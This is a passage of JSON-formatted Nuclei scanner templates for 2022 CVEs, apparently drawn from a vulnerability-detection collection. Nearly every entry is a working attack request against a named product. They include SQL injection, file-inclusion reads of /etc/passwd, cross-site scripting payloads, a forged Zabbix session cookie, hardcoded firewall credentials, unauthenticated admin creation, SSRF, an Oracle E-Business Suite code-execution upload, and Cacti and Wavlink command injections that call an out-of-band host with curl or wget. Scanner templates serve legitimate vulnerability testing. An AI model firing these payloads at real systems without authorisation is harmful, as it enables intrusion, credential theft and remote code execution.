Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/zabbix/index_sso.php","{{BaseURL}}/index_sso.php"],"stop-at-first-match":true,"headers":{"Cookie":"zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(tolower(header), 'location: zabbix.php?action=dashboard.view')"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2022-43164","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=global_lists/lists&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&notes=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-27849","info":{"name":"WordPress Simple Ajax Chat <20220116 - Sensitive Information Disclosure vulnerability","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/simple-ajax-chat/sac-export.csv"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"Chat Log\"","\"User IP\"","\"User ID\""],"condition":"and"},{"type":"word","part":"header","words":["text/csv"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0679","info":{"name":"WordPress Narnoo Distributor <=2.5.1 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\naction=narnoo_distributor_lib_request&lib_path=/etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2486","info":{"name":"Wavlink WN535K2/WN535K3 - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://{{interactsh-url}};%27 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-43167","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_alerts/users_alerts&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=warning&title=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&location=all&start_date=&end_date=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-28955","info":{"name":"D-Link DIR-816L - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/category_view.php","{{BaseURL}}/folder_view.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<title>SharePort Web Access</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1724","info":{"name":"WordPress Simple Membership <4.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=swpm_validate_email&fieldId=%22%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"<script>alert(document.domain)</script>\","]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38467","info":{"name":"CRM Perks Forms < 1.1.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/crm-perks-forms/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/crm-perks-forms/templates/sample_file.php?FirstName=<img%20src%20onerror=alert(document.domain)>&LastName=<img%20src%20onerror=alert(document.domain)>&%20Company=<img%20src%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(content_type_2, \"text/html\")","contains(body_1, \"CRM Perks Forms\") && contains(body_2, \"<img src onerror=alert(document.domain)>\")"],"condition":"and"}]}]},{"id":"CVE-2022-46934","info":{"name":"kkFileView 4.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/picturesPreview?currentUrl=aHR0cDovLyIpO2FsZXJ0KGRvY3VtZW50LmRvbWFpbik7Ly8=&urls"],"matchers-condition":"and","matchers":[{"type":"word","words":["document.getElementById(\"http://\");alert(document.domain);//\").click();","viewer.min.css"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25485","info":{"name":"Cuppa CMS v1.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /alerts/alertLightbox.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=../../../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-21587","info":{"name":"Oracle E-Business Suite 12.2.3 -12.2.11 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv\n\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"bne:uueupload\"\n\nTRUE\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"uploadfilename\";filename=\"testzuue.zip\"\n\nbegin 664 test.zip\nM4$L#!!0``````\"]P-%;HR5LG>@```'H```!#````+BXO+BXO+BXO+BXO+BXO\nM1DU77TAO;64O3W)A8VQE7T5\"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.\nM1%=24BYP;'5S92!#1TD[\"G!R:6YT($-'23HZ:&5A9&5R*\"`M='EP92`]/B`G\nM=&5X=\"]P;&%I;B<@*3L*;7D@)&-M9\"`](\")E8VAO($YU8VQE:2U#5D4M,C`R\nM,BTR,34X-R([\"G!R:6YT('-Y<W1E;2@D8VUD*3L*97AI=\"`P.PH*4$L!`A0#\nM%```````+W`T5NC)6R=Z````>@```$,``````````````+2!`````\"XN+RXN\nM+RXN+RXN+RXN+T9-5U](;VUE+T]R86-L95]%0E,M87!P,2]C;VUM;VXO<V-R\nG:7!T<R]T>&M&3D174E(N<&Q02P4&``````$``0!Q````VP``````\n`\nend\n------WebKitFormBoundaryZsMro0UsAQYLDZGv--\n","GET /OA_CGI/FNDWRR.exe HTTP/1.1\nHost: {{Hostname}}\n","POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv\n\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"bne:uueupload\"\n\nTRUE\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"uploadfilename\";filename=\"testzuue.zip\"\n\nbegin 664 test.zip\nM4$L#!!0``````&UP-%:3!M<R`0````$```!#````+BXO+BXO+BXO+BXO+BXO\nM1DU77TAO;64O3W)A8VQE7T5\"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.\nM1%=24BYP;`I02P$\"%`,4``````!M<#16DP;7,@$````!````0P``````````\nM````M($`````+BXO+BXO+BXO+BXO+BXO1DU77TAO;64O3W)A8VQE7T5\"4RUA\nM<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.1%=24BYP;%!+!08``````0`!`'$`\n(``!B````````\n`\nend\n"],"matchers":[{"type":"word","part":"body_2","words":["Nuclei-CVE-2022-21587"]}]}]},{"id":"CVE-2022-37191","info":{"name":"Cuppa CMS v1.0 - Authenticated Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Ftable_manager%2Fview%2Fcu_api_keys\n","POST /api/index.php HTTP/1.1\nHost: {{Hostname}}\nkey: {{apikey}}\nContent-Type: application/x-www-form-urlencoded\n\nfunction=./../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd/\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header_3","words":["text/html"]},{"type":"regex","part":"body_3","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"apikey","group":1,"regex":["<td class='td_key'>(.*?)</td>"],"internal":true}]}]},{"id":"CVE-2022-22954","info":{"name":"VMware Workspace ONE Access - Server-Side Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Authorization context is not valid"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-24681","info":{"name":"ManageEngine ADSelfService Plus <6121 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /servlet/GetProductVersion HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(buildnumber, '< 6121')"]},{"type":"word","part":"body","words":["ManageEngine"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"buildnumber","group":1,"regex":["\"BUILD_NUMBER\":\"([0-9]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-0968","info":{"name":"Microweber <1.2.12 - Integer Overflow","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /admin/view:modules/load_module:users/edit-user:2 HTTP/1.1\nHost: {{Hostname}}\n","POST /api/user/2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nthumbnail=&id=2&token={{form_token}}&_method=PATCH&username={{user}}&verify_password=&first_name={{payload}}&last_name=test&email={{email}}&phone=&is_admin=0&is_active=1&basic_mode=0&api_key=\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_3,'\\\"first_name\\\":\\\"{{payload}}\\\"')","status_code_3==200","contains(header_3,\"application/json\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"form_token","group":1,"regex":["<input type=\"hidden\" name=\"token\" value=\"(.*)\" autocomplete=\"off\">"],"internal":true,"part":"body"},{"type":"regex","name":"user","group":1,"regex":["<input type=\"text\" class=\"form-control\" name=\"username\" value=\"(.*)\">"],"internal":true,"part":"body"},{"type":"regex","name":"email","group":1,"regex":["<input type=\"email\" class=\"form-control\" name=\"email\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-32429","info":{"name":"MSNSwitch Firmware MNT.2408 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin-hax/ExportSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SSID1"]},{"type":"regex","part":"header","regex":["filename=\"Settings(.*).dat","application/octet-stream"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0952","info":{"name":"WordPress Sitemap by click5 <1.0.36 - Missing Authorization","severity":"high"},"requests":[{"raw":["POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json;charset=UTF-8\n\n{\"users_can_register\":\"1\"}\n","POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json;charset=UTF-8\n\n{\"default_role\":\"administrator\"}\n","POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json;charset=UTF-8\n\n{\"users_can_register\":\"0\"}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header, \"application/json\")","status_code == 200","contains(body_1, 'users_can_register')","contains(body_2, 'default_role')"],"condition":"and"}]}]},{"id":"CVE-2022-42746","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting.","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-26148","info":{"name":"Grafana & Zabbix Integration - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?redirect=%2F"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zabbix\":","\"zbx\":","alexanderzobnin-zabbix-datasource"],"condition":"or"},{"type":"regex","part":"body","regex":["\"password\":\"(.*?)\"","\"username\":\"(.*?)\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"password\":\"(.*?)\"","\"username\":\"(.*?)\"","\"url\":\"([a-z:/0-9.]+)\\/api_jsonrpc\\.php"]}]}]},{"id":"CVE-2022-22536","info":{"name":"SAP Memory Pipes (MPI) Desynchronization","severity":"critical"},"requests":[{"raw":["GET {{sap_path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 82646\nConnection: keep-alive\n\n{{repeat(\"A\", 82642)}}\n\nGET / HTTP/1.1\nHost: {{Hostname}}\n\n"],"payloads":{"sap_path":["/sap/admin/public/default.html","/sap/public/bc/ur/Login/assets/corbu/sap_logo.png"]},"stop-at-first-match":true,"unsafe":true,"read-all":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(tolower(body), 'administration')","contains(tolower(header), 'content-type: image/png')"],"condition":"or"},{"type":"word","part":"body","words":["HTTP/1.0 400 Bad Request","HTTP/1.0 500 Internal Server Error","HTTP/1.0 500 Dispatching Error"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42094","info":{"name":"Backdrop CMS version 1.23.0 - Stored Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?q=user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n","GET /?q=node/add/card HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=node/add/card HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryWEcZgRB4detkrGaY\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"title\"\n\n{{randstr}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"files[field_image_und_0]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"field_image[und][0][fid]\"\n\n0\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"field_image[und][0][display]\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"changed\"\n\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"form_build_id\"\n\n{{form_id_2}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"form_token\"\n\n{{form_token}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"form_id\"\n\ncard_node_form\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"body[und][0][value]\"\n\n<img src=x onerror=alert(document.domain)>\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"body[und][0][format]\"\n\nfull_html\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"status\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"name\"\n\n{{name}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"date[date]\"\n\n2023-04-13\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"date[time]\"\n\n21:49:36\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"path[auto]\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"comment\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"additional_settings__active_tab\"\n\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"op\"\n\nSave\n------WebKitFormBoundaryWEcZgRB4detkrGaY--\n"],"cookie-reuse":true,"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=\"x\" onerror=\"alert(document.domain)\" />","Backdrop CMS"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"form_id_1","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"name","group":1,"regex":["name=\"name\" value=\"(.*?)\""],"internal":true},{"type":"regex","name":"form_id_2","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_token","group":1,"regex":["name=\"form_token\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-0867","info":{"name":"WordPress ARPrice <3.6.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=arplite_insert_plan_id&arp_plan_id=x&arp_template_id=1+AND+(SELECT+8948+FROM+(SELECT(SLEEP(6)))iIic)\n","GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_1 == 200","contains(content_type_1, \"text/html\")","contains(body_2, \"ArpPriceTable\")"],"condition":"and"}]}]},{"id":"CVE-2022-1386","info":{"name":"WordPress Fusion Builder <3.6.2 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{RootURL}}\n\naction=fusion_form_update_view\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------30259827232283860776499538268\nOrigin: {{BaseURL}}\nReferer: {{RootURL}}\n\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"formData\"\n\nemail=example%40example.com&fusion_privacy_store_ip_ua=false&fusion_privacy_expiration_interval=48&priva\ncy_expiration_action=ignore&fusion-form-nonce-0={{fusionformnonce}}&fusion-fields-hold-private-data=\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"action\"\n\nfusion_form_submit_form_to_url\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"fusion_form_nonce\"\n\n{{fusionformnonce}}\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"form_id\"\n\n0\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"post_id\"\n\n0\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"field_labels\"\n\n{\"email\":\"Email address\"}\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"hidden_field_names\"\n\n[]\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"fusionAction\"\n\nhttps://oast.me\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"fusionActionMethod\"\n\nGET\n-----------------------------30259827232283860776499538268--\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Interactsh Server"]},{"type":"status","status":[200]}],"extractors":[{"type":"xpath","name":"fusionformnonce","internal":true,"xpath":["//*[@id=\"fusion-form-nonce-0\"]"],"attribute":"value","part":"body_1"}]}]},{"id":"CVE-2022-25369","info":{"name":"Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin User Creation","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{rand_base(6)}}&adminpassword={{rand_base(6)}}&adminemail=test@test.com&adminname=test"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"Success\": true","\"Success\":true"],"condition":"or"},{"type":"word","part":"header","words":["application/json","ASP.NET_SessionId"],"condition":"and","case-insensitive":true},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-46169","info":{"name":"Cacti <=1.2.22 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=;curl%20{{interactsh-url}}%20-H%20'User-Agent%3a%20{{useragent}}'; HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-For: 127.0.0.1\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"value\":","\"local_data_id\":"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0785","info":{"name":"WordPress Daily Prayer Time <2022.03.01 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=get_monthly_timetable&month=1+AND+(SELECT+6881+FROM+(SELECT(SLEEP(6)))iEAn) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"dptTimetable customStyles dptUserStyles\")"],"condition":"and"}]}]},{"id":"CVE-2022-4063","info":{"name":"WordPress InPost Gallery <2.1.4.1 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=inpost_gallery_get_gallery&popup_shortcode_key=inpost_fancy&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ=="],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30776","info":{"name":"Atmail 6.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/atmail/index.php/admin/index/?error=1%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Error: 1<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-48165","info":{"name":"Wavlink - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportLogs.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Password=","Login="],"condition":"and"},{"type":"word","part":"header","words":["filename=\"sysLogs.txt\""]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["Password=([^\\s]+)"]}]}]},{"id":"CVE-2022-31299","info":{"name":"Haraj 3.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/payform.php?type=upgrade&upgradeid=1&upgradegd=6&price=123&t=1&note=%3C/textarea%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script></textarea>","content=\"nextHaraj"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30489","info":{"name":"Wavlink WN-535G3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnewUI=1&page=login&username=admin&langChange=0&ipaddr=x.x.x.x&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=\")</script><script>alert(document.domain);</script>&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(document.domain);</script>","parent.location.replace(\"http://\")"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-35413","info":{"name":"WAPPLES Web Application Firewall <=6.0 - Hardcoded Credentials","severity":"critical"},"requests":[{"raw":["POST /webapi/auth HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid={{username}}&password={{password}}\n"],"payloads":{"username":["systemi"],"password":["db/wp.no1"]},"attack":"pitchfork","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"res_msg\":\"Authentication Success.\"","\"doc_id\":\"user_systemi\""],"condition":"and"},{"type":"word","part":"header","words":["WP_SESSID="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31847","info":{"name":"WAVLINK WN579 X3 M79X3.V5030.180719 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportAllSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","words":["Login=","Password=","Model=","AuthMode="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-37299","info":{"name":"Shirne CMS 1.2.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=/etc/passwd&maxwidth=-1&referer=test"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["cm9vd"]},{"type":"word","part":"header","words":["image/png"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42748","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting.","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-31984","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/requests/take_action.php?id=6'+UNION+ALL+SELECT+md5('{{num}}'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0378","info":{"name":"Microweber Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["mwui_init","onmousemove=\"alert(document.domain)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-33891","info":{"name":"Apache Spark UI - Remote Command 